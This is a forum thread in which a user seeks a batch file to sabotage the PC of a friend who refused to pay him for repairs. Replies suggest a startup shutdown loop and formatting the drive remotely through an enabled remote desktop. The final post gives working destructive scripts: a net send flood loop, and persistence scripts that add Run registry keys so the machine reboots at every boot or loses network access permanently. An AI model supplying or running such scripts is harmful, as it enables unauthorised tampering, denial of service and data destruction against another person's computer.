Auto delete w/o prompt batch file

Status
Not open for further replies.

Kratos

Solid State Member
This is my situation.

I have spent a day working on a, so called, friends PC and now she refuses to pay me. I am broke and really need the money. I would like to leave her with a simple Batch file that will disable the system after a certain amount of time. So that when she calls me to fix it again I can charge her up front.

I was thinking about a delete batch or, even better, a auto format C:, without prompt or echo.

Or, I have the admin password. Can I make her account expire on date xx/xx/xxxx?

Please help!

I'm not sure about the ethics of making a batch file that deletes files, so how about something a little less harmless. ;)

Create a batch file on the c: drive called whatever you want. Inside put 'shutdown -s -t 15' without the quotes. Create a shortcut to that file in the "Startup" folder in the Start Menu.

Not destructure, and will basically reboot the PC infinately.

I'm not sure about the ethics of making a batch file that deletes files, so how about something a little less harmless. ;)

Create a batch file on the c: drive called whatever you want. Inside put 'shutdown -s -t 15' without the quotes. Create a shortcut to that file in the "Startup" folder in the Start Menu.

Not destructure, and will basically reboot the PC infinately.

I tried that this is what I got...

C:\>shutdown -s -t 15
'shutdown' is not recognized as an internal or external command,
operable program or batch file.

No, win2kp

I found this utility called devcon.exe that lets me put a reboot command in a batch file. I'm going to see if I can schedule the Autoexe.bat to be replaced, in 30 days, with a one that has the reboot command.

Thanks for pointing me in the right direcetion. This will drive her crazy and teach her my time is worth something.

FYI...

She asked me to fix her computer and said she would help me find a job. Let me use her spare room until I found work. I live in a different town and want to move to the town she lives in. More jobs there. After I fixed her computer, that she has let others work on for two months, she changed her mind. She will call me back and ask for help again, but next time I'm going to get paid. IN ADVANCE!!!

What i would do if someone didnt pay me, is activate remote desktop. then log in with the admin account and just fomat the drive, or just set the password to expire. Or you could format it with "format c: /fs:ntfs", if u dont get paid then i dont see a problem with this.

Here you go :)

Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

Disable Internet / Network

ipconfig /release

Shutdown Computer

shutdown -r -f -t0

Harmful

Shutdown Computer Every Time It Is Booted Up

echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Undergroundkyng Strikes Again
PAUSE

Disable Internet / Network Permanently

echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Undergroundkyng Strikes Again
PAUSE

Status
Not open for further replies.
Back
Top Bottom